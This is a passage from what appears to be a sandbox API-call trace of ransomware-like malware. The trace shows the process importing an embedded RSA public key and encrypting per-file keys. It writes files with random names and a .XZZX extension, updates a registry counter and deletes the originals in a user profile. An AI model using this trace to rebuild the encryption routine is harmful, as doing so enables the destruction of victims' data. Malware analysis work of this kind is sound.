MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.363] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0100.363] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.363] SetErrorMode (uMode=0x1) returned 0x1 [0100.363] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0100.363] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xd70bf92f, Data2=0xb7b3, Data3=0x4915, Data4=([0]=0x92, [1]=0x5e, [2]=0x69, [3]=0x21, [4]=0xa6, [5]=0x88, [6]=0xe6, [7]=0x14))) returned 0x0 [0100.363] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 126 [0100.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.363] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\EC7FD4DD34711CAFD70BF92F389200F7.XZZX") returned 71 [0100.363] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="XZZX") returned 0x0 [0100.363] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", dwFileAttributes=0x20) returned 1 [0100.364] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 267 os_tid = 0x640 [0100.517] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.517] lstrcpyW (in: lpString1=0x420f460, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0100.517] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.517] SetErrorMode (uMode=0x1) returned 0x1 [0100.517] lstrcpyW (in: lpString1=0x420f860, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0100.517] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xf3a63863, Data2=0xa20b, Data3=0x4e4c, Data4=([0]=0xba, [1]=0x17, [2]=0xb3, [3]=0xf, [4]=0x9e, [5]=0x21, [6]=0xc0, [7]=0xf2))) returned 0x0 [0100.517] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 126 [0100.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.517] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\A7D31241318F7544F3A6386335B0598C.XZZX") returned 71 [0100.517] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="XZZX") returned 0x0 [0100.518] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", dwFileAttributes=0x20) returned 1 [0100.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 268 os_tid = 0x690 [0100.673] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.673] lstrcpyW (in: lpString1=0x420f460, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0100.673] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0100.673] SetErrorMode (uMode=0x1) returned 0x1 [0100.673] lstrcpyW (in: lpString1=0x420f860, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0100.673] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0x84d63acc, Data2=0x25ce, Data3=0x4a54, Data4=([0]=0x81, [1]=0xf0, [2]=0xe, [3]=0x51, [4]=0x90, [5]=0xa6, [6]=0x5d, [7]=0xef))) returned 0x0 [0100.673] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned 44 [0100.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.673] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX") returned 71 [0100.673] StrStrW (lpFirst="ntuser.ini", lpSrch="XZZX") returned 0x0 [0100.674] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", dwFileAttributes=0x20) returned 1 [0100.674] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0 [0100.675] ReadFile (in: hFile=0x2c0, lpBuffer=0x3a8a10, nNumberOfBytesToRead=0x14, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3a8a10*, lpNumberOfBytesRead=0x420e418*=0x14, lpOverlapped=0x0) returned 1 [0100.675] CloseHandle (hObject=0x2c0) returned 1 [0100.675] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0100.676] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0100.676] SetErrorMode (uMode=0x1) returned 0x1 [0100.676] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0100.676] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4094e8) returned 1 [0100.764] CryptGenKey (in: hProv=0x4094e8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5590) returned 1 [0101.104] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0101.104] CryptExportKey (in: hKey=0x3a5590, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0101.104] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0101.105] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0101.105] CryptDestroyKey (hKey=0x3a5590) returned 1 [0101.105] CryptReleaseContext (hProv=0x4094e8, dwFlags=0x0) returned 1 [0101.105] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\DAE2CC280AF9F39884D63ACC0F1AD7E0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\dae2cc280af9f39884d63acc0f1ad7e0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0101.106] WriteFile (in: hFile=0x2f0, lpBuffer=0x3a8a10*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3a8a10*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0101.107] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x14 [0101.107] WriteFile (in: hFile=0x2f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0101.107] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0101.107] WriteFile (in: hFile=0x2f0, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x14, lpOverlapped=0x0) returned 1 [0101.107] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x2d [0101.107] WriteFile (in: hFile=0x2f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0101.107] SetFilePointer (in: hFile=0x2f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x32 [0101.107] SetErrorMode (uMode=0x1) returned 0x1 [0101.107] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0101.107] OutputDebugStringW (lpOutputString="end") [0101.107] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vðòF", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0101.109] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0101.113] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x4094e8) returned 1 [0101.114] CryptImportPublicKeyInfo (in: hCryptProv=0x4094e8, dwCertEncodingType=0x1, pInfo=0x3cb04b8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb04e8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb04f0*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5610) returned 1 [0101.115] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0101.116] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0101.116] CryptEncrypt (in: hKey=0x3a5610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0101.116] CryptEncrypt (in: hKey=0x3a5610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3b7f08*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3b7f08*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0101.116] WriteFile (in: hFile=0x2f0, lpBuffer=0x3b7f08*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3b7f08*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0101.116] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0101.116] WriteFile (in: hFile=0x2f0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0101.116] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0101.117] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0101.117] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x2f4) returned 0x0 [0101.117] RegQueryValueExW (in: hKey=0x2f4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x67, lpcbData=0x420dfdc*=0x4) returned 0x0 [0101.117] RegCloseKey (hKey=0x2f4) returned 0x0 [0101.117] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x2f4) returned 0x0 [0101.117] RegSetValueExW (in: hKey=0x2f4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x68, cbData=0x4 | out: lpData=0x420dfec*=0x68) returned 0x0 [0101.117] RegCloseKey (hKey=0x2f4) returned 0x0 [0101.117] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.117] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.118] CloseHandle (hObject=0x2f0) returned 1 [0101.123] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0101.124] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0101.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 1 [0101.125] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini")) returned 0 Thread: id = 269 os_tid = 0x6ac [0100.984] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0100.984] lstrcpyW (in: lpString1=0x434f460, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0100.984] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0100.984] SetErrorMode (uMode=0x1) returned 0x1 [0100.985] lstrcpyW (in: lpString1=0x434f860, lpString2="278D60903B72BF40F401616C3FAFA388.XZZX" | out: lpString1="278D60903B72BF40F401616C3FAFA388.XZZX") returned="278D60903B72BF40F401616C3FAFA388.XZZX" [0100.985] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x3d322615, Data2=0x889d, Data3=0x4b1e, Data4=([0]=0x97, [1]=0xc, [2]=0x8a, [3]=0xf1, [4]=0x61, [5]=0x0, [6]=0xe0, [7]=0x53))) returned 0x0 [0100.985] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\278D60903B72BF40F401616C3FAFA388.XZZX") returned 80 [0100.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0100.985] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\2BFC82E1281601663D3226152C4AE5AE.XZZX") returned 80 [0100.985] StrStrW (lpFirst="278D60903B72BF40F401616C3FAFA388.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 270 os_tid = 0x6c4 [0101.108] lstrcpyA (in: lpString1=0x434fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0101.108] lstrcpyW (in: lpString1=0x434f460, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0101.108] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0101.108] SetErrorMode (uMode=0x1) returned 0x1 [0101.108] lstrcpyW (in: lpString1=0x434f860, lpString2="3180D48C036A6FAAA02E258A076353F2.XZZX" | out: lpString1="3180D48C036A6FAAA02E258A076353F2.XZZX") returned="3180D48C036A6FAAA02E258A076353F2.XZZX" [0101.108] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0x94775491, Data2=0xb665, Data3=0x4556, 